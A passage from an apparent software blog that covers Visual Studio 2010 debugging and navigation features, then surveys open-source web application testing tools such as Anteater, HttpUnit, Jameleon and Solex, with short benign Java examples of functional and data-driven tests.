Navigating to a specific piece of code is now very easy. Because Visual Studio 2010 is built on top of WPF, it filters properly as you type. Press CTRL+, to open the “Navigate To” dialog; it shows a list of matching items as soon as you start typing in the “Search terms” field.

Better Toolbox Support:

Visual Studio now comes with better Toolbox support. You can now search for a Toolbox item very easily. Just type the name of the item and the IDE moves the focus to the matching element. Pressing TAB moves the focus to the next matching element.

Breakpoints:

Breakpoint handling is now better. A team can share breakpoints by importing and exporting them. You can pin a debug value so that you can return to it later, and you can add a label to a breakpoint.

Here is a brief example. Suppose that while debugging your module you find a problem in a colleague’s module that is causing issues in yours. Simply telling him about it means he has to debug the code again and locate the problem himself. In the VS2010 IDE you can instead pin the debug value, export the breakpoint with suitable comments as XML, and send it to him. Once he imports it into his IDE, he sees the breakpoint along with the debug value from the last session. From there he can investigate the root cause instead of hunting for the location again. This is very useful for sharing debug information within a team.

The one thing I don’t like here is that the XML stores the breakpoint information by line number. If the code has been modified on the other team member’s side, the import will not work correctly. The only requirement for import/export to work correctly is that the shared code file has not been modified.

IntelliTrace:

Visual Studio now has a feature called “IntelliTrace”, with which you can trace each step of your debugging session. This is very useful in a larger UI application, where you can find the calling thread information in the IntelliTrace window.

Conclusion

There are more features, such as better TFS support, built-in support for cloud development, modeling and reports, which I have not explored yet. Once I explore those, I will cover them in a separate post. For now, go ahead and learn the Visual Studio 2010 features and get familiar with them for more productive development.

Thursday, September 9, 2010

Many organizations are surprised to find that testing with tools is more expensive. To benefit from testing tools, you must think carefully about which tests to use tools for and about which tool to choose.

Anteater is a testing framework designed around Ant, from the Apache Jakarta Project. It is basically a set of Ant tasks for the functional testing of Web sites and Web services (functional testing being: hit a URL and ensure the response meets certain criteria). One can test HTTP parameters, response codes, XPath, regexp, and Relax NG expressions. Anteater also includes HTML reporting (based on junitreport) and a hierarchical grouping system for quickly configuring large test scripts. When a Web request is received, Anteater can check the parameters of the request and send a response accordingly. This makes it useful for testing SOAP and XML applications.
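The idea of functional testing described above (hit a URL, then check the response against criteria) can be sketched in plain Java. This is not Anteater's Ant task syntax; it is a minimal illustration using only JDK classes, with a hypothetical `FunctionalCheck` class and a throwaway local stub server standing in for the site under test.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.URI;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

// Hypothetical sketch of a functional check; not Anteater's API.
final class FunctionalCheck {

    // Hits the URL and reports whether the status code and body meet the criteria.
    static boolean check(String url, int expectedStatus, String bodyRegex) {
        try {
            HttpURLConnection conn = (HttpURLConnection) URI.create(url).toURL().openConnection();
            try {
                int status = conn.getResponseCode();
                if (status != expectedStatus) {
                    return false;
                }
                // Error responses (4xx/5xx) expose their body through the error stream.
                InputStream in = status >= 400 ? conn.getErrorStream() : conn.getInputStream();
                String body = "";
                if (in != null) {
                    try (InputStream stream = in) {
                        body = new String(stream.readAllBytes(), StandardCharsets.UTF_8);
                    }
                }
                return Pattern.compile(bodyRegex).matcher(body).find();
            } finally {
                conn.disconnect();
            }
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Starts a stub server on a free local port that serves one page at /hello.
    static HttpServer startStub() {
        try {
            HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
            server.createContext("/hello", exchange -> {
                byte[] body = "<html><title>Welcome</title></html>".getBytes(StandardCharsets.UTF_8);
                exchange.sendResponseHeaders(200, body.length);
                try (OutputStream out = exchange.getResponseBody()) {
                    out.write(body);
                }
            });
            server.start();
            return server;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        HttpServer server = startStub();
        try {
            String base = "http://127.0.0.1:" + server.getAddress().getPort();
            System.out.println("title check passed: "
                    + check(base + "/hello", 200, "<title>Welcome</title>"));
        } finally {
            server.stop(0);
        }
    }
}
```

A real test suite would point `check` at the application under test rather than at a stub, and would collect the results into a report instead of printing them.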

The ability to wait for incoming HTTP messages is unique to Anteater, which makes it especially useful when building tests for applications that use high-level SOAP-based communication, like ebXML or BizTalk. Applications written using these protocols usually receive SOAP messages and send back a meaningless response. Only later do they inform the client of the results of the processing, by making an HTTP request to the client. These are the so-called asynchronous SOAP messages, and they are at the heart of many high-level protocols based on SOAP or XML messages.

Written in Java, HttpUnit emulates the relevant portions of browser behavior, including form submission, Javascript, basic HTTP authentication, cookies, and automatic page redirection, and allows Java test code to examine returned pages either as text, an XML DOM, or containers of forms, tables, and links.

jWebUnit is a Java framework which facilitates creation of acceptance tests for Web applications. It provides a high-level API for navigating a Web application combined with a set of assertions to verify the application's correctness. This includes navigation via links, form entry and submission, validation of table contents, and other typical business Web application features. It utilizes HttpUnit behind the scenes. The simple navigation methods and ready-to-use assertions allow for more rapid test creation than using only JUnit and HttpUnit.

Bugkilla is a tool set to create, maintain, execute, and analyze functional system tests of Web applications. Specification and execution of tests is automated for both the Web frontend and business logic layers. One goal is to integrate with existing frameworks and tools (an Eclipse plugin exists).

The Grinder, a Java load testing framework freely available under a BSD-style Open Source license, makes it easy to orchestrate the activities of a test script in many processes across many machines, using a graphical console application. Test scripts make use of client code embodied in Java plugins. Most users of The Grinder do not write plugins themselves; they use one of the supplied plugins. The Grinder comes with a mature plugin for testing HTTP services, as well as a tool which allows HTTP scripts to be automatically recorded.

Jameleon is an automated testing tool that separates applications into features and allows those features to be tied together independently, creating test cases. These test cases can then be data-driven and executed against different environments. Jameleon breaks applications into features and allows testing at any level, simply by passing in different data for the same test. Because Jameleon is based on Java and XML, there is no need to learn a proprietary technology.

It's an acceptance testing tool for testing the functionality provided by applications, and currently supports the testing of Web applications. It differs from regular HttpUnit and jWebUnit in that it separates testing of features from the actual test cases themselves. If I understand it correctly, you write the feature tests separately and then script them together into a reusable test case. Incidentally, you can also make these test cases data-driven, which gives an easy way of running specific tests on specific environments.

The framework has a plugin architecture, allowing different functional testing tools to be used, and there is a plugin for testing Web applications using HttpUnit/jWebUnit. The test case scripting is done with XML and Jelly.

Jameleon combines XDoclet, Ant and Jelly to provide a potentially powerful framework for solid functional testing of your Webapp. It strikes a good balance between scripting and coding, and allows you to set up multiple inputs per test by providing input via CSV files. Along with the flexibility comes complexity and maintenance overhead, but you are getting your Webapp tested for you.
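The data-driven idea, running one test against many rows of input taken from a CSV file, can be sketched as follows. This is plain Java rather than Jameleon's XML/Jelly scripting, the class `DataDrivenSketch` is hypothetical, and the CSV parsing is deliberately naive (header row first, no quoted fields).

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Predicate;

// Hypothetical sketch of data-driven testing; not Jameleon's API.
final class DataDrivenSketch {

    // Parses simple CSV text (header row first, no quoted fields) into one map per data row.
    static List<Map<String, String>> parseCsv(String csv) {
        String[] lines = csv.trim().split("\\R");
        String[] header = lines[0].split(",");
        List<Map<String, String>> rows = new ArrayList<>();
        for (int i = 1; i < lines.length; i++) {
            String[] cells = lines[i].split(",", -1);
            Map<String, String> row = new LinkedHashMap<>();
            for (int c = 0; c < header.length; c++) {
                row.put(header[c].trim(), c < cells.length ? cells[c].trim() : "");
            }
            rows.add(row);
        }
        return rows;
    }

    // Runs the same test against every row and returns the number of failing rows.
    static int runAll(List<Map<String, String>> rows, Predicate<Map<String, String>> test) {
        int failures = 0;
        for (Map<String, String> row : rows) {
            if (!test.test(row)) {
                failures++;
            }
        }
        return failures;
    }

    public static void main(String[] args) {
        // Stand-in data: each row gives an input and the length we expect it to have.
        String csv = "input,expectedLength\nant,3\njelly,5\nxdoclet,7\n";
        int failures = runAll(parseCsv(csv),
                row -> row.get("input").length() == Integer.parseInt(row.get("expectedLength")));
        System.out.println("failing rows: " + failures);
    }
}
```

The test logic stays the same while the CSV changes, which is what makes it easy to run the same feature test with different data for different environments.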

LogiTest is the core application in the LogiTest suite. LogiTest is designed to aid in the testing of Web site functionality. It currently supports HTTP and HTTPS protocols, GET and POST methods, multiple document views, custom headers, and more. The LogiTest application provides a simple graphical user interface for creating and playing back tests for testing Internet-based applications.

Solex is a set of Eclipse plugins providing non-regression and stress tests of Web application servers. Test scripts are recorded from Internet browsers, thanks to a built-in Web proxy. For some Web applications, a request depends on a previous server's response. To address such a requirement, Solex introduces the concept of extraction and replacement rules. An extraction rule tied to an HTTP message's content will bind an extracted value with a variable. A replacement rule will replace any part of an HTTP message with variable content.

The tool therefore provides an easy way to extract URL parameters, Header values, or any part of a request or a response, bind their values with variables, and then replace URL parameters, Header values, or any part of a request with the variable content. The user has the ability to add assertions for each response. Once a response has been received, all assertions of this response will be called to ensure that it is valid. If not, the playback process is stopped. Several kinds of rules and assertions are provided. The most complicated ones support regular expressions and XPath.
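Extraction and replacement rules of this kind can be illustrated with a short Java sketch. It does not use Solex's own rule format: the `RuleSketch` class is hypothetical, and the `${name}` placeholder syntax in the request template is an assumption made for this example only.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical sketch of extraction and replacement rules; not Solex's rule format.
final class RuleSketch {

    // Extraction rule: bind capture group 1 of the regex, applied to a response,
    // to the named variable. Does nothing if the regex finds no match.
    static void extract(String response, String regex, String variable, Map<String, String> vars) {
        Matcher m = Pattern.compile(regex).matcher(response);
        if (m.find()) {
            vars.put(variable, m.group(1));
        }
    }

    // Replacement rule: substitute every ${name} placeholder (an assumed syntax)
    // in the request with the value bound to that variable.
    static String replace(String requestTemplate, Map<String, String> vars) {
        String result = requestTemplate;
        for (Map.Entry<String, String> e : vars.entrySet()) {
            result = result.replace("${" + e.getKey() + "}", e.getValue());
        }
        return result;
    }

    public static void main(String[] args) {
        Map<String, String> vars = new HashMap<>();
        // A recorded response header carrying a session id issued by the server.
        extract("Set-Cookie: JSESSIONID=abc123; Path=/", "JSESSIONID=([^;]+)", "session", vars);
        // The next request must carry the id that the server just issued.
        System.out.println(replace("GET /cart?sid=${session} HTTP/1.1", vars));
    }
}
```

Here the session id from the first response is bound to the variable `session` and then substituted into the following request, so the example prints `GET /cart?sid=abc123 HTTP/1.1`.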

Tclwebtest is a tool for writing automated tests of Web applications in Tcl. It implements some basic HTML parsing functionality to provide comfortable commands for operations on the HTML elements (most importantly forms) of the result pages.

TagUnit is a framework through which custom tags can be tested inside the container and in isolation from the pages on which they will ultimately be used. In essence, it's a tag library for testing tags within JSP pages. This means that it is easy to unit test tags, including the content that they generate and the side effects that they have on the environment, such as the introduction of scripting variables, page context attributes, cookies, etc.

Web Form Flooder is a Java console utility that analyzes a Web page, completes any forms present on the page with reasonable data, and submits the data. It crawls links within the site in order to identify and flood additional forms that may be present. It is great for load testing of Web forms, checking that all links work and that forms submit correctly.

XmlTestSuite provides a powerful way to test Web applications. Writing tests requires only knowledge of HTML and XML. The authors want XmlTestSuite to be adopted by testers, business analysts, and Web developers who don't have a Java background. XmlTestSuite supports "test-driven development". It lets you separate page structure from tests and test data. It can also verify databases. It's like JWebUnit, but has simple XML test definitions and reusable pages. The problems with raw HTTPUnit or JWebUnit are that:

- It's very hard to get non-programmers to write tests.

- Tests are so ugly you can't read them. (Trust me; HttpUnit test classes are a nightmare to maintain.)

- Web tests generally change far more often than unit tests, and so need to be altered, but your refactoring won't change them automatically (i.e., changing a JSP in IDEA will not cascade to the test like changing a class will).